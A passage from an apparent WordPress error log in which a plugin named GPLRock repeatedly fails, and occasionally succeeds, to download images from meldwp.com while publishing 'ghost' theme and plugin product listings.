super-backup-clone-migrate-for-wordpress. URL: https://meldwp.com/wp-content/uploads/super-backup--clone---migrate-for-wordpress-9442.webp [05-Apr-2026 00:40:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-backup-clone-migrate-for-wordpress [05-Apr-2026 00:40:49 UTC] GPLRock: Image download failed for product wordpress-virtual-tour-360-panorama-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:51 UTC] GPLRock: Image download failed for product wordpress-virtual-tour-360-panorama-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-virtual-tour-360-panorama-plugin-23501.webp for product wordpress-virtual-tour-360-panorama-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:53 UTC] GPLRock: Image download failed for product wordpress-virtual-tour-360-panorama-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:55 UTC] GPLRock: Image download failed for product wordpress-virtual-tour-360-panorama-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-virtual-tour-360-panorama-plugin-23501.webp for product wordpress-virtual-tour-360-panorama-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:58 UTC] GPLRock WARNING: Image download failed for product wordpress-virtual-tour-360-panorama-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-virtual-tour-360-panorama-plugin-23501.webp [05-Apr-2026 00:40:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-virtual-tour-360-panorama-plugin [05-Apr-2026 00:40:58 UTC] GPLRock: Image download failed for product green-box-for-wordpress-manage-and-sell-banners (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:00 UTC] GPLRock: Image download failed for product green-box-for-wordpress-manage-and-sell-banners (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-box-for-wordpress---manage-and-sell-banners-33021.webp for product green-box-for-wordpress-manage-and-sell-banners after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:02 UTC] GPLRock: Image download failed for product green-box-for-wordpress-manage-and-sell-banners (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:04 UTC] GPLRock: Image download failed for product green-box-for-wordpress-manage-and-sell-banners (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-box-for-wordpress---manage-and-sell-banners-33021.webp for product green-box-for-wordpress-manage-and-sell-banners after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:06 UTC] GPLRock WARNING: Image download failed for product green-box-for-wordpress-manage-and-sell-banners. URL: https://meldwp.com/wp-content/uploads/green-box-for-wordpress---manage-and-sell-banners-33021.webp [05-Apr-2026 00:41:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: green-box-for-wordpress-manage-and-sell-banners [05-Apr-2026 00:41:22 UTC] GPLRock: Image downloaded successfully for product universh-education-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23ddfa2f.webp [05-Apr-2026 00:41:22 UTC] GPLRock: Using pre-downloaded image for product universh-education-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23ddfa2f.webp [05-Apr-2026 00:41:22 UTC] GPLRock: Ghost product published with image - Product ID: universh-education-multipurpose-wordpress-theme [05-Apr-2026 00:41:22 UTC] GPLRock: Image download failed for product attorney-press-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:24 UTC] GPLRock: Image download failed for product attorney-press-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/attorney-press---lawyer-wordpress-theme-23341.webp for product attorney-press-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:26 UTC] GPLRock: Image download failed for product attorney-press-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:28 UTC] GPLRock: Image download failed for product attorney-press-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/attorney-press---lawyer-wordpress-theme-23341.webp for product attorney-press-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:31 UTC] GPLRock WARNING: Image download failed for product attorney-press-lawyer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/attorney-press---lawyer-wordpress-theme-23341.webp [05-Apr-2026 00:41:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: attorney-press-lawyer-wordpress-theme [05-Apr-2026 00:41:31 UTC] GPLRock: Image download failed for product choper-butcher-meat-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:33 UTC] GPLRock: Image download failed for product choper-butcher-meat-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/choper---butcher-meat-shop-wordpress-theme-20719.webp for product choper-butcher-meat-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:35 UTC] GPLRock: Image download failed for product choper-butcher-meat-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:37 UTC] GPLRock: Image download failed for product choper-butcher-meat-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/choper---butcher-meat-shop-wordpress-theme-20719.webp for product choper-butcher-meat-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:39 UTC] GPLRock WARNING: Image download failed for product choper-butcher-meat-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/choper---butcher-meat-shop-wordpress-theme-20719.webp [05-Apr-2026 00:41:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: choper-butcher-meat-shop-wordpress-theme [05-Apr-2026 00:41:39 UTC] GPLRock: Image download failed for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:41 UTC] GPLRock: Image download failed for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/browcraft---microblading--eyebrow-beauty-salon-wordpress-theme-22075.webp for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:44 UTC] GPLRock: Image download failed for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:46 UTC] GPLRock: Image download failed for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/browcraft---microblading--eyebrow-beauty-salon-wordpress-theme-22075.webp for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:48 UTC] GPLRock WARNING: Image download failed for product browcraft-microblading-eyebrow-beauty-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/browcraft---microblading--eyebrow-beauty-salon-wordpress-theme-22075.webp [05-Apr-2026 00:41:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: browcraft-microblading-eyebrow-beauty-salon-wordpress-theme [05-Apr-2026 00:41:48 UTC] GPLRock: Image download failed for product food-pizzeria-ultimate-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:50 UTC] GPLRock: Image download failed for product food-pizzeria-ultimate-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/food--pizzeria---ultimate-delivery-wordpress-theme-7894.webp for product food-pizzeria-ultimate-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:52 UTC] GPLRock: Image download failed for product food-pizzeria-ultimate-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:54 UTC] GPLRock: Image download failed for product food-pizzeria-ultimate-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/food--pizzeria---ultimate-delivery-wordpress-theme-7894.webp for product food-pizzeria-ultimate-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:41:56 UTC] GPLRock WARNING: Image download failed for product food-pizzeria-ultimate-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/food--pizzeria---ultimate-delivery-wordpress-theme-7894.webp [05-Apr-2026 00:41:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: food-pizzeria-ultimate-delivery-wordpress-theme [05-Apr-2026 00:41:57 UTC] GPLRock: Image download failed for product bouplay-wp-a-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:41:59 UTC] GPLRock: Image download failed for product bouplay-wp-a-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bouplay-wp---a-wordpress-theme-for-bloggers-28988.webp for product bouplay-wp-a-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:01 UTC] GPLRock: Image download failed for product bouplay-wp-a-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:03 UTC] GPLRock: Image download failed for product bouplay-wp-a-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bouplay-wp---a-wordpress-theme-for-bloggers-28988.webp for product bouplay-wp-a-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:05 UTC] GPLRock WARNING: Image download failed for product bouplay-wp-a-wordpress-theme-for-bloggers. URL: https://meldwp.com/wp-content/uploads/bouplay-wp---a-wordpress-theme-for-bloggers-28988.webp [05-Apr-2026 00:42:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bouplay-wp-a-wordpress-theme-for-bloggers [05-Apr-2026 00:42:05 UTC] GPLRock: Image download failed for product phami-medical-health-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:07 UTC] GPLRock: Image download failed for product phami-medical-health-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phami--medical--health-woocommerce-wordpress-theme-18879.webp for product phami-medical-health-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:10 UTC] GPLRock: Image download failed for product phami-medical-health-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:12 UTC] GPLRock: Image download failed for product phami-medical-health-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phami--medical--health-woocommerce-wordpress-theme-18879.webp for product phami-medical-health-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:14 UTC] GPLRock WARNING: Image download failed for product phami-medical-health-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/phami--medical--health-woocommerce-wordpress-theme-18879.webp [05-Apr-2026 00:42:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: phami-medical-health-woocommerce-wordpress-theme [05-Apr-2026 00:42:15 UTC] GPLRock: Image download failed for product mover-pro-wordpress-theme-for-packers-movers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:17 UTC] GPLRock: Image download failed for product mover-pro-wordpress-theme-for-packers-movers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mover-pro---wordpress-theme-for-packers--movers-16576.webp for product mover-pro-wordpress-theme-for-packers-movers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:19 UTC] GPLRock: Image download failed for product mover-pro-wordpress-theme-for-packers-movers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:21 UTC] GPLRock: Image download failed for product mover-pro-wordpress-theme-for-packers-movers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mover-pro---wordpress-theme-for-packers--movers-16576.webp for product mover-pro-wordpress-theme-for-packers-movers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:23 UTC] GPLRock WARNING: Image download failed for product mover-pro-wordpress-theme-for-packers-movers. URL: https://meldwp.com/wp-content/uploads/mover-pro---wordpress-theme-for-packers--movers-16576.webp [05-Apr-2026 00:42:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mover-pro-wordpress-theme-for-packers-movers [05-Apr-2026 00:42:23 UTC] GPLRock: Image download failed for product linden-single-property-realestate-agent-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:25 UTC] GPLRock: Image download failed for product linden-single-property-realestate-agent-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/linden--single-property-realestate-agent-wordpress-5102.webp for product linden-single-property-realestate-agent-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:28 UTC] GPLRock: Image download failed for product linden-single-property-realestate-agent-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:30 UTC] GPLRock: Image download failed for product linden-single-property-realestate-agent-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/linden--single-property-realestate-agent-wordpress-5102.webp for product linden-single-property-realestate-agent-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:32 UTC] GPLRock WARNING: Image download failed for product linden-single-property-realestate-agent-wordpress. URL: https://meldwp.com/wp-content/uploads/linden--single-property-realestate-agent-wordpress-5102.webp [05-Apr-2026 00:42:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: linden-single-property-realestate-agent-wordpress [05-Apr-2026 00:42:32 UTC] GPLRock: Image download failed for product realand-real-estate-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:34 UTC] GPLRock: Image download failed for product realand-real-estate-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/realand---real-estate-responsive-wordpress-theme-17084.webp for product realand-real-estate-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:36 UTC] GPLRock: Image download failed for product realand-real-estate-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:38 UTC] GPLRock: Image download failed for product realand-real-estate-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:42:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/realand---real-estate-responsive-wordpress-theme-17084.webp for product realand-real-estate-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:42:41 UTC] GPLRock WARNING: Image download failed for product realand-real-estate-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/realand---real-estate-responsive-wordpress-theme-17084.webp [05-Apr-2026 00:42:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: realand-real-estate-responsive-wordpress-theme [05-Apr-2026 00:43:10 UTC] GPLRock: Image download failed for product products-view-in-room-popup-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:12 UTC] GPLRock: Image download failed for product products-view-in-room-popup-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/products-view-in-room-popup--woocommerce-wordpress-27778.webp for product products-view-in-room-popup-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:14 UTC] GPLRock: Image download failed for product products-view-in-room-popup-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:16 UTC] GPLRock: Image download failed for product products-view-in-room-popup-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/products-view-in-room-popup--woocommerce-wordpress-27778.webp for product products-view-in-room-popup-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:18 UTC] GPLRock WARNING: Image download failed for product products-view-in-room-popup-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/products-view-in-room-popup--woocommerce-wordpress-27778.webp [05-Apr-2026 00:43:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: products-view-in-room-popup-woocommerce-wordpress [05-Apr-2026 00:43:18 UTC] GPLRock: Image download failed for product husky-woocommerce-products-filter-professional-woof-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:20 UTC] GPLRock: Image download failed for product husky-woocommerce-products-filter-professional-woof-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/husky---woocommerce-products-filter-professional-woof-filter-18913.webp for product husky-woocommerce-products-filter-professional-woof-filter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:23 UTC] GPLRock: Image download failed for product husky-woocommerce-products-filter-professional-woof-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:25 UTC] GPLRock: Image download failed for product husky-woocommerce-products-filter-professional-woof-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/husky---woocommerce-products-filter-professional-woof-filter-18913.webp for product husky-woocommerce-products-filter-professional-woof-filter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:27 UTC] GPLRock WARNING: Image download failed for product husky-woocommerce-products-filter-professional-woof-filter. URL: https://meldwp.com/wp-content/uploads/husky---woocommerce-products-filter-professional-woof-filter-18913.webp [05-Apr-2026 00:43:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: husky-woocommerce-products-filter-professional-woof-filter [05-Apr-2026 00:43:27 UTC] GPLRock: Image downloaded successfully for product wordpress-woocommerce-quick-invoice-pdf (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53480dd0.webp [05-Apr-2026 00:43:27 UTC] GPLRock: Using pre-downloaded image for product wordpress-woocommerce-quick-invoice-pdf: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53480dd0.webp [05-Apr-2026 00:43:27 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-woocommerce-quick-invoice-pdf [05-Apr-2026 00:43:27 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:29 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-manual-pricing---name-your-price-plugin-24171.webp for product woocommerce-manual-pricing-name-your-price-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:31 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:33 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-manual-pricing---name-your-price-plugin-24171.webp for product woocommerce-manual-pricing-name-your-price-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:35 UTC] GPLRock WARNING: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-manual-pricing---name-your-price-plugin-24171.webp [05-Apr-2026 00:43:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-manual-pricing-name-your-price-plugin [05-Apr-2026 00:43:36 UTC] GPLRock: Image download failed for product woocommerce-backorder-manager-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:38 UTC] GPLRock: Image download failed for product woocommerce-backorder-manager-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-backorder-manager-pro-14142.webp for product woocommerce-backorder-manager-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:40 UTC] GPLRock: Image download failed for product woocommerce-backorder-manager-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:42 UTC] GPLRock: Image download failed for product woocommerce-backorder-manager-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-backorder-manager-pro-14142.webp for product woocommerce-backorder-manager-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:44 UTC] GPLRock WARNING: Image download failed for product woocommerce-backorder-manager-pro. URL: https://meldwp.com/wp-content/uploads/woocommerce-backorder-manager-pro-14142.webp [05-Apr-2026 00:43:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-backorder-manager-pro [05-Apr-2026 00:43:44 UTC] GPLRock: Image downloaded successfully for product woocommerce-hotel-reservation-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d633794c.webp [05-Apr-2026 00:43:44 UTC] GPLRock: Using pre-downloaded image for product woocommerce-hotel-reservation-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d633794c.webp [05-Apr-2026 00:43:44 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-hotel-reservation-plugin [05-Apr-2026 00:43:44 UTC] GPLRock: Image download failed for product wiloke-faqs-prite-elementor-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:47 UTC] GPLRock: Image download failed for product wiloke-faqs-prite-elementor-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-faqs-prite-elementor-addon-13525.webp for product wiloke-faqs-prite-elementor-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:49 UTC] GPLRock: Image download failed for product wiloke-faqs-prite-elementor-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:51 UTC] GPLRock: Image download failed for product wiloke-faqs-prite-elementor-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-faqs-prite-elementor-addon-13525.webp for product wiloke-faqs-prite-elementor-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:53 UTC] GPLRock WARNING: Image download failed for product wiloke-faqs-prite-elementor-addon. URL: https://meldwp.com/wp-content/uploads/wiloke-faqs-prite-elementor-addon-13525.webp [05-Apr-2026 00:43:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-faqs-prite-elementor-addon [05-Apr-2026 00:43:53 UTC] GPLRock: Image download failed for product approve-new-user-registration-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:55 UTC] GPLRock: Image download failed for product approve-new-user-registration-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:43:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/approve-new-user-registration-wordpress--woocommerce-plugin-4980.webp for product approve-new-user-registration-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:43:57 UTC] GPLRock: Image download failed for product approve-new-user-registration-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:00 UTC] GPLRock: Image download failed for product approve-new-user-registration-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/approve-new-user-registration-wordpress--woocommerce-plugin-4980.webp for product approve-new-user-registration-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:44:02 UTC] GPLRock WARNING: Image download failed for product approve-new-user-registration-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/approve-new-user-registration-wordpress--woocommerce-plugin-4980.webp [05-Apr-2026 00:44:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: approve-new-user-registration-wordpress-woocommerce-plugin [05-Apr-2026 00:44:03 UTC] GPLRock: Image downloaded successfully for product product-price-info-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bc51d57.webp [05-Apr-2026 00:44:03 UTC] GPLRock: Using pre-downloaded image for product product-price-info-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bc51d57.webp [05-Apr-2026 00:44:03 UTC] GPLRock: Ghost product published with image - Product ID: product-price-info-for-woocommerce [05-Apr-2026 00:44:03 UTC] GPLRock: Image download failed for product woocommerce-order-status-per-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:05 UTC] GPLRock: Image download failed for product woocommerce-order-status-per-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-status-per-product-16138.webp for product woocommerce-order-status-per-product after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:44:08 UTC] GPLRock: Image download failed for product woocommerce-order-status-per-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:10 UTC] GPLRock: Image download failed for product woocommerce-order-status-per-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:44:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-status-per-product-16138.webp for product woocommerce-order-status-per-product after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:44:12 UTC] GPLRock WARNING: Image download failed for product woocommerce-order-status-per-product. URL: https://meldwp.com/wp-content/uploads/woocommerce-order-status-per-product-16138.webp [05-Apr-2026 00:44:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-order-status-per-product [05-Apr-2026 00:45:30 UTC] GPLRock: Image downloaded successfully for product ninja-forms-stripe (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e285da1.jpg [05-Apr-2026 00:45:30 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-stripe: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e285da1.jpg [05-Apr-2026 00:45:30 UTC] GPLRock: Ghost product published with image - Product ID: 